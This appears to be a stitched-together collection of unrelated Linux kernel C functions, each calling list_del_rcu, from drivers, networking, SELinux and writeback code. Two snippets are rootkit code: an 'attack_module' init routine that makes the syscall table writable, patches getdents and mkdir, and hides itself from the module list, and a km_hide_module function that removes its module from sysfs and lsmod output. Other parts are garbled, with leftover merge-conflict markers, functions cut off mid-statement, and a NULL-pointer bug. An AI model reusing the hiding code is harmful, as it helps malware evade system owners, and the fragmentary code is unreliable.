/* assumes ctl_mtx is held */ static void _unload_ssd(struct ssd_info * ssd) { if (NULL == ssd) return; /* first remove it from the set of cache devices, no more * requests will be queued to this device beyond this point */ if (ssd->cdev) { sce_rmcdev(ssd->cdev); ssd->cdev = NULL; } /* make offline and quiesce requests already in flight */ if (ssd->online) { ssd->online = 0; list_del_rcu(&ssd->list); wmb(); synchronize_rcu(); /* wait for references to quiesce */ while(atomic_read(&ssd->nr_ref)) schedule(); gctx.nr_ssd--; } if (ssd->bdev) { #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,38) blkdev_put(ssd->bdev, FMODE_READ | FMODE_WRITE | FMODE_EXCL); #elif LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,28) close_bdev_exclusive(ssd->bdev, FMODE_READ | FMODE_WRITE | FMODE_EXCL); #else ERR("Kernel version < 2.6.28 currently not supported.\n"); #endif ssd->bdev = NULL; } }
void hsr_del_port(struct hsr_port *port) { struct hsr_priv *hsr; struct hsr_port *master; hsr = port->hsr; master = hsr_port_get_hsr(hsr, HSR_PT_MASTER); list_del_rcu(&port->port_list); if (port != master) { if (master != NULL) { netdev_update_features(master->dev); dev_set_mtu(master->dev, hsr_get_max_mtu(hsr)); } netdev_rx_handler_unregister(port->dev); dev_set_promiscuity(port->dev, -1); } /* FIXME? * netdev_upper_dev_unlink(port->dev, port->hsr->dev); */ synchronize_rcu(); if (port != master) dev_put(port->dev); }
void vxbox_flow_free(struct sw_flow *flow, bool deferred) { if (!flow) return; if (flow->mask) { struct sw_flow_mask *mask = flow->mask; /* vxbox-lock is required to protect mask-refcount and * mask list. */ ASSERT_OVSL(); BUG_ON(!mask->ref_count); mask->ref_count--; if (!mask->ref_count) { list_del_rcu(&mask->list); if (deferred) call_rcu(&mask->rcu, rcu_free_sw_flow_mask_cb); else kfree(mask); } } if (deferred) call_rcu(&flow->rcu, rcu_free_flow_callback); else flow_free(flow); }
/** * __aa_remove_ns - remove a namespace and all its children * @ns: namespace to be removed (NOT NULL) * * Requires: ns->parent->lock be held and ns removed from parent. */ void __aa_remove_ns(struct aa_ns *ns) { /* remove ns from namespace list */ list_del_rcu(&ns->base.list); destroy_ns(ns); aa_put_ns(ns); }
/** * sel_netnode_insert - Insert a new node into the table * @node: the new node record * * Description: * Add a new node record to the network address hash table. * */ static void sel_netnode_insert(struct sel_netnode *node) { unsigned int idx; switch (node->nsec.family) { case PF_INET: idx = sel_netnode_hashfn_ipv4(node->nsec.addr.ipv4); break; case PF_INET6: idx = sel_netnode_hashfn_ipv6(&node->nsec.addr.ipv6); break; default: BUG(); } /* we need to impose a limit on the growth of the hash table so check * this bucket to make sure it is within the specified bounds */ list_add_rcu(&node->list, &sel_netnode_hash[idx].list); if (sel_netnode_hash[idx].size == SEL_NETNODE_HASH_BKT_LIMIT) { struct sel_netnode *tail; tail = list_entry( rcu_dereference(sel_netnode_hash[idx].list.prev), struct sel_netnode, list); list_del_rcu(&tail->list); kfree_rcu(tail, rcu); } else
/* * Remove bdi from bdi_list, and ensure that it is no longer visible */ static void bdi_remove_from_list(struct backing_dev_info *bdi) { spin_lock_bh(&bdi_lock); list_del_rcu(&bdi->bdi_list); spin_unlock_bh(&bdi_lock); synchronize_rcu_expedited(); }
static void set_pmic_vibrator(int on) { int rc; /*++ Kevin Shiu - 20121003 Save intensity using liked list ++*/ vibrator_list *vibrator = NULL; /*-- Kevin Shiu - 20121003 Save intensity using liked list --*/ rc = pmic_vib_mot_set_mode(PM_VIB_MOT_MODE__MANUAL); if (rc) { pr_err("%s: Vibrator set mode failed", __func__); return; } /*++ Kevin Shiu - 20121003 Save intensity using liked list ++*/ if(on && (vibrator_list_head.next == &vibrator_list_head)){ pr_err("%s: list_head is invalid", __func__); return; } if(on){ //get vibrator_list pointer vibrator = list_entry(vibrator_list_head.next , vibrator_list , list); rc = pmic_vib_mot_set_volt(vibrator->vibrator_level); //if ture, it means that only creates a structure. if(vibrator->list.next == vibrator->list.prev){ list_del_rcu(&vibrator_list_head); INIT_LIST_HEAD(&vibrator_list_head); }else{ list_del_rcu(&vibrator->list); } //free kfree(vibrator); }else{ rc = pmic_vib_mot_set_volt(0); } /*-- Kevin Shiu - 20121003 Save intensity using liked list --*/ if (rc) pr_err("%s: Vibrator set voltage level failed", __func__); }
static void xprt_switch_remove_xprt_locked(struct rpc_xprt_switch *xps, struct rpc_xprt *xprt) { if (unlikely(xprt == NULL)) return; xps->xps_nxprts--; if (xps->xps_nxprts == 0) xps->xps_net = NULL; smp_wmb(); list_del_rcu(&xprt->xprt_switch); }
void llc_sap_close(struct llc_sap *sap) { WARN_ON(sap->sk_count); spin_lock_bh(&llc_sap_list_lock); list_del_rcu(&sap->node); spin_unlock_bh(&llc_sap_list_lock); synchronize_rcu(); kfree(sap); }
static inline void micvcons_del_timer_entry(micvcons_port_t *port) { spin_lock(&timer_list_lock); list_del_rcu(&port->list_member); if (list_empty(&timer_list_head)) { restart_timer_flag = MICVCONS_TIMER_SHUTDOWN; spin_unlock(&timer_list_lock); del_timer_sync(&vcons_timer); } else { spin_unlock(&timer_list_lock); } synchronize_rcu(); }
/** * sel_netport_insert - Insert a new port into the table * @port: the new port record * * Description: * Add a new port record to the network address hash table. * */ static void sel_netport_insert(struct sel_netport *port) { unsigned int idx; /* we need to impose a limit on the growth of the hash table so check * this bucket to make sure it is within the specified bounds */ idx = sel_netport_hashfn(port->psec.port); list_add_rcu(&port->list, &sel_netport_hash[idx].list); if (sel_netport_hash[idx].size == SEL_NETPORT_HASH_BKT_LIMIT) { struct sel_netport *tail; tail = list_entry( rcu_dereference(sel_netport_hash[idx].list.prev), struct sel_netport, list); list_del_rcu(&tail->list); kfree_rcu(tail, rcu); } else
static void flow_mask_del_ref(struct sw_flow_mask *mask, bool deferred) { if (!mask) return; BUG_ON(!mask->ref_count); mask->ref_count--; if (!mask->ref_count) { list_del_rcu(&mask->list); if (deferred) call_rcu(&mask->rcu, rcu_free_sw_flow_mask_cb); else kfree(mask); } }
/* Use the Supervision frame's info about an eventual MacAddressB for merging * nodes that has previously had their MacAddressB registered as a separate * node. */ void hsr_handle_sup_frame(struct sk_buff *skb, struct hsr_node *node_curr, struct hsr_port *port_rcv) { struct hsr_node *node_real; struct hsr_sup_payload *hsr_sp; struct list_head *node_db; int i; skb_pull(skb, sizeof(struct hsr_ethhdr_sp)); hsr_sp = (struct hsr_sup_payload *) skb->data; if (ether_addr_equal(eth_hdr(skb)->h_source, hsr_sp->MacAddressA)) /* Not sent from MacAddressB of a PICS_SUBS capable node */ goto done; /* Merge node_curr (registered on MacAddressB) into node_real */ node_db = &port_rcv->hsr->node_db; node_real = find_node_by_AddrA(node_db, hsr_sp->MacAddressA); if (!node_real) /* No frame received from AddrA of this node yet */ node_real = hsr_add_node(node_db, hsr_sp->MacAddressA, HSR_SEQNR_START - 1); if (!node_real) goto done; /* No mem */ if (node_real == node_curr) /* Node has already been merged */ goto done; ether_addr_copy(node_real->MacAddressB, eth_hdr(skb)->h_source); for (i = 0; i < HSR_PT_PORTS; i++) { if (!node_curr->time_in_stale[i] && time_after(node_curr->time_in[i], node_real->time_in[i])) { node_real->time_in[i] = node_curr->time_in[i]; node_real->time_in_stale[i] = node_curr->time_in_stale[i]; } if (seq_nr_after(node_curr->seq_out[i], node_real->seq_out[i])) node_real->seq_out[i] = node_curr->seq_out[i]; } node_real->AddrB_port = port_rcv->type; list_del_rcu(&node_curr->mac_list); kfree_rcu(node_curr, rcu_head); done: skb_push(skb, sizeof(struct hsr_ethhdr_sp)); }
int init_module() { int bootresult; struct module* this_mod; preempt_disable(); printk(KERN_INFO "Attempting to initialize attack module.\n"); hiddenDirectories = vector_init(); make_rw(sys_call_table); //make a backup of the system call table memcpy(backup_sys_call_table, sys_call_table, sizeof(backup_sys_call_table)); //start up the payload //this has been changed, the payload now starts the rootkit //bootresult = bootprocess(); //if (bootresult) printk(KERN_INFO "Boot process failed: %d", bootresult); //shim the syscalls. patch(SYS_getdents, getdentsShim); //patch(SYS_read, readShim); patch(SYS_mkdir, mkdirShim); //patch(SYS_fork, forkShim); //patch(SYS_clone, cloneShim); //patch(SYS_open, openShim); //patch(SYS_close, closeShim); //request module and payload to be hidden //These are now done by the payload //hideDirectory(secret_ko_name); //hideDirectory(secret_payload_name); //hide this module from the list mutex_lock(&module_mutex); this_mod = find_module("attack_module"); //it turns out the name attack_module is part of the binary, not the filename if (this_mod) { printk(KERN_INFO "found module, hiding\n"); list_del_rcu(&this_mod->list); } else { printk(KERN_INFO "could not find module\n"); } mutex_unlock(&module_mutex); printk(KERN_INFO "Module loaded\n"); preempt_enable(); return 0; }
void svc_exit_thread(struct svc_rqst *rqstp) { struct svc_serv *serv = rqstp->rq_server; struct svc_pool *pool = rqstp->rq_pool; spin_lock_bh(&pool->sp_lock); pool->sp_nrthreads--; if (!test_and_set_bit(RQ_VICTIM, &rqstp->rq_flags)) list_del_rcu(&rqstp->rq_all); spin_unlock_bh(&pool->sp_lock); svc_rqst_free(rqstp); /* Release the server */ if (serv) svc_destroy(serv); }
struct mpls_ilm* mpls_remove_ilm (unsigned int key) { struct mpls_ilm *ilm = NULL; MPLS_ENTER; ilm = radix_tree_delete (&mpls_ilm_tree, key); if (!ilm) { MPLS_DEBUG("node key %u not found.\n",key); return NULL; } list_del_rcu(&ilm->global); mpls_ilm_release (ilm); MPLS_EXIT; return ilm; }
struct mpls_nhlfe* mpls_remove_nhlfe (unsigned int key) { struct mpls_nhlfe *nhlfe = NULL; MPLS_ENTER; nhlfe = radix_tree_delete(&mpls_nhlfe_tree, key); if (!nhlfe) MPLS_DEBUG("NHLFE node with key %u not found.\n",key); list_del_rcu(&nhlfe->global); /* release the refcnt for the tree hold it */ mpls_nhlfe_release (nhlfe); MPLS_EXIT; return nhlfe; }
static void km_hide_module( const char* const data ) { kobject* kobj = &THIS_MODULE->mkobj.kobj; path km_path; // Check to ensure we're hidden first... if ( g_state.hidden ) { return; } g_state.hidden = 1; // Remove from sysfs mutex_lock( g_sysfs_mutex ); sysfs_unlink_sibling( kobj->sd ); mutex_unlock( g_sysfs_mutex ); kobj->state_in_sysfs = 0; spin_lock( &kobj->kset->list_lock ); list_del_init( &kobj->entry ); spin_unlock( &kobj->kset->list_lock ); kset_put( kobj->kset ); // Decrement parent ref count in sysfs kobject_put( kobj->parent ); // Remove the km module from the dentry cache if it's present if ( kern_path( "/sys/module/km", LOOKUP_DIRECTORY, &km_path ) == 0 && km_path.dentry ) { d_drop( km_path.dentry ); } // Remove from the module list - so lsmod can't see us mutex_lock( &module_mutex ); list_del_rcu( &THIS_MODULE->list ); mutex_unlock( &module_mutex ); }
static void cgwb_release_workfn(struct work_struct *work) { struct bdi_writeback *wb = container_of(work, struct bdi_writeback, release_work); struct backing_dev_info *bdi = wb->bdi; spin_lock_irq(&cgwb_lock); list_del_rcu(&wb->bdi_node); spin_unlock_irq(&cgwb_lock); wb_shutdown(wb); css_put(wb->memcg_css); css_put(wb->blkcg_css); fprop_local_destroy_percpu(&wb->memcg_completions); percpu_ref_exit(&wb->refcnt); wb_exit(wb); kfree_rcu(wb, rcu); if (atomic_dec_and_test(&bdi->usage_cnt)) wake_up_all(&cgwb_release_wait); }
/* * Choose a thread to kill, for svc_set_num_threads */ static inline struct task_struct * choose_victim(struct svc_serv *serv, struct svc_pool *pool, unsigned int *state) { unsigned int i; struct task_struct *task = NULL; if (pool != NULL) { spin_lock_bh(&pool->sp_lock); } else { /* choose a pool in round-robin fashion */ for (i = 0; i < serv->sv_nrpools; i++) { pool = &serv->sv_pools[--(*state) % serv->sv_nrpools]; spin_lock_bh(&pool->sp_lock); if (!list_empty(&pool->sp_all_threads)) goto found_pool; spin_unlock_bh(&pool->sp_lock); } return NULL; } found_pool: if (!list_empty(&pool->sp_all_threads)) { struct svc_rqst *rqstp; /* * Remove from the pool->sp_all_threads list * so we don't try to kill it again. */ rqstp = list_entry(pool->sp_all_threads.next, struct svc_rqst, rq_all); set_bit(RQ_VICTIM, &rqstp->rq_flags); list_del_rcu(&rqstp->rq_all); task = rqstp->rq_task; } spin_unlock_bh(&pool->sp_lock); return task; }
/** >>>>>>> 296c66da8a02d52243f45b80521febece5ed498a * sel_netif_destroy - Remove an interface record from the table * @netif: the existing interface record * * Description: * Remove an existing interface record from the network interface table. * */ static void sel_netif_destroy(struct sel_netif *netif) { list_del_rcu(&netif->list); sel_netif_total--; <<<<<<< HEAD
/** * netlbl_af6list_remove_entry - Remove an IPv6 address entry * @entry: address entry * * Description: * Remove the specified IP address entry. The caller is responsible for * calling the necessary locking functions. * */ void netlbl_af6list_remove_entry(struct netlbl_af6list *entry) { entry->valid = 0; list_del_rcu(&entry->list); }
static void acpi_os_drop_map_ref(struct acpi_ioremap *map) { if (!--map->refcount) list_del_rcu(&map->list); }
static void avc_node_delete(struct avc_node *node) { list_del_rcu(&node->list); call_rcu(&node->rhead, avc_node_free); atomic_dec(&avc_cache.active_nodes); }
static void cgwb_remove_from_bdi_list(struct bdi_writeback *wb) { spin_lock_irq(&cgwb_lock); list_del_rcu(&wb->bdi_node); spin_unlock_irq(&cgwb_lock); }
static void cgwb_remove_from_bdi_list(struct bdi_writeback *wb) { list_del_rcu(&wb->bdi_node); }